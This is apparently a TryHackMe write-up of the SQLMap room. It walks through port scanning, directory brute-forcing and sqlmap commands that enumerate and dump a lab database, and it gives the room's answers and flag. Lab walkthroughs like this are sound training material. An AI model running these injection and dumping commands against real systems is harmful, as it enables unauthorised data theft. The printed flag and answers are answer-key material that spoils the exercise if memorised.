SQLMAP -TryhackMe Writeup

SQLMAP -TryhackMe Writeup





Task 1: Introduction

What is Sqlmap ?

sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws in web applications. SQL injection is a critical security vulnerability that allows an attacker to interfere with the queries an application makes to its database, potentially leading to unauthorized data access, data modification, or even complete database takeover.


Task 2: Using Sqlmap



Task 3: SQLMap Challenge


Started by running the default Rustscan.


rustscan -a 10.10.90.138 -- -A  -sV         

I found port 80 to be open.

I visited the website and discovered this.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.90.138         

I ran the Gobuster tool to find any available directories. I found /blood.


It had a login page and a registration option. I clicked on the login, then used Burp Suite to intercept the login page and saved it as a TXT file.

We now use SQLMap to enumerate the databases for usernames, passwords, and all other data that can be found in them.

To enumerate the current database:

sqlmap -r sqlmap.txt --current-db        

sqlmap -r sqlmap.txt --dbs        

Now that we are interested in the flag table, we run the dump command to retrieve its details.

sqlmap -r sqlmap.txt -D blood --tables        

Now I can check each table. I select the second table named flag, which is of interest, and check for available columns in it with the following command.

sqlmap -r sqlmap.txt -D blood -T flag --columns        

and dump all the information within this particular database table named "flag" using the following command:

sqlmap -r sqlmap.txt-D blood -T flag --dump

Question 1 : What is the name of the interesting directory ?Answer : blood

Question 2 : Who is the current db user?

Answer : root

Question 3 : What is the final flag?

Ans : thm{sqlm@p_is_L0ve}



Thanks for visiting:

要查看或添加评论,请登录

Santosh Kumar的更多文章

  • Offensive Security So_Simple CTF Walkthrough

    Offensive Security So_Simple CTF Walkthrough

    Vrijanandan Kumar SANTOSH KUSHWAHA We scan the site with nmap. This shows two open port.

    1 条评论
  • CyberSploit1 | OffSec Writeup

    CyberSploit1 | OffSec Writeup

    Cybersploit-1 is a popular lab from Offensive Security (OffSec) designed to help users improve their penetration…

  • Different CTF from TryHackMe

    Different CTF from TryHackMe

    A Hard THM Challenge. Steganography, Database Handling, FTP, WordPress CMS, and Brute-Forcing.

  • Shakabrah Walkthrough OffSec

    Shakabrah Walkthrough OffSec

    In this walkthrough, I'll take you through the steps to tackle the "Shakabrah" box from OffSec. This concise guide…

    1 条评论
  • TryHackMe- Kenobi-Walkthrough

    TryHackMe- Kenobi-Walkthrough

    SANTOSH KUSHWAHA Vrijanandan Kumar The "Kenobi" room on TryHackMe is an engaging challenge that guides you through the…

  • Wonderland -TryHackme Walkthrough

    Wonderland -TryHackme Walkthrough

    /SANTOSH KUSHWAHA Wonderland CTF link: TryHackMe | Wonderland The Wonderland challenge on TryHackMe is a cybersecurity…

  • Library - TryHackMe Walkthrough

    Library - TryHackMe Walkthrough

    Scan the machine:' We first find the list of services that are running on the machine. We use the below Rustscan…

  • Vulnversity — Walkthrough Tryhackme

    Vulnversity — Walkthrough Tryhackme

    Introduction "Vulnversity" is an introductory level room on TryHackMe that covers various penetration testing…

  • Poster TryHacMe Walkthrough

    Poster TryHacMe Walkthrough

    SANTOSH KUSHWAHA The "Poster" room focuses on web application security, specifically SQL injection, directory…

    1 条评论
  • Seppuku offsec Walkthrough

    Seppuku offsec Walkthrough

    SANTOSH KUMAR The Seppuku Offsec lab is a virtual penetration testing environment available on Vulnhub, designed to…

社区洞察